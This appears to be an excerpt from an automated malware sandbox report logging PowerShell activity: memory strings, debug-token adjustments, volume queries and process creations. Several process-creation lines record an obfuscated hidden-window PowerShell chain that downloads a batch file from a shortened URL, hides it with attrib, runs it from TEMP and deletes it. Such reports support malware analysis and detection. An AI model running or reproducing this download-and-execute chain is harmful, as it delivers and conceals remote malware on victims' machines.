Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 0000000E.00000003.465164775.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmld1
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1d
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllO
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
